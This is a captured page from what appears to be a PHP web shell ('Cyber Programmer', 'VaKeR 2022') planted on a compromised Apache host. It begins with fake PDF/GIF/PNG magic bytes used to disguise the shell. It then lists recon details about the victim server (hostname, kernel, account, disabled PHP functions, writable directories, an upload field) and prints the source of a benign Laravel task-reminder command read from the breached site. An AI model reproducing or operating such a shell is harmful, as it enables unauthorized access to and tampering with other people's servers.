%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/public_html/admin1/app/Console/Commands/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/public_html/admin1/app/Console/Commands/SendTaskReminder.php
<?php

namespace App\Console\Commands;

use App\Events\TaskReminderEvent;
use App\Models\Company;
use App\Models\Task;
use App\Models\TaskboardColumn;
use Carbon\Carbon;
use Illuminate\Console\Command;

class SendTaskReminder extends Command
{

    /**
     * The name and signature of the console command.
     *
     * @var string
     */
    protected $signature = 'send-task-reminder';

    /**
     * The console command description.
     *
     * @var string
     */
    protected $description = 'Send task reminders';

    /**
     *
     */
    public function handle()
    {
        // Get all companies
        $companies = Company::select(['id', 'timezone', 'before_days', 'after_days', 'on_deadline'])->get();

        // Loop through each company
        foreach ($companies as $company) {
            // Get current time in company's timezone
            $now = Carbon::now($company->timezone);

            // If the company has set "before_days"
            if ($company->before_days > 0) {
                $beforeDeadline = $now->clone()->subDays($company->before_days)->format('Y-m-d');
                $this->sendReminders($beforeDeadline, $company);
            }

            // If the company has set "after_days"
            if ($company->after_days > 0) {
                $afterDeadline = $now->clone()->addDays($company->after_days)->format('Y-m-d');
                $this->sendReminders($afterDeadline, $company);
            }

            // If the company has set "on_deadline"
            if ($company->on_deadline) {
                $onDeadline = $now->clone()->format('Y-m-d');
                $this->sendReminders($onDeadline, $company);
            }
        }
    }

    /**
     * Send task reminders for the given date and company.
     *
     * @param string $dueDate
     * @param \App\Models\Company $company
     *
     * @return void
     */
    private function sendReminders(string $dueDate, Company $company)
    {
        // Get the "completed" taskboard column for the company
        $completedTaskColumn = TaskboardColumn::where('company_id', $company->id)
            ->where('slug', 'completed')
            ->first();

        // Get all tasks for the given date and company that are not in the "completed" column
        $tasks = Task::select('id')
            ->where('due_date', $dueDate)
            ->where('company_id', $company->id)
            ->where('board_column_id', '<>', $completedTaskColumn->id)
            ->get();

        // Loop through each task
        foreach ($tasks as $task) {
            // Fire a TaskReminderEvent for the task
            event(new TaskReminderEvent($task));
        }
    }

}

VaKeR 2022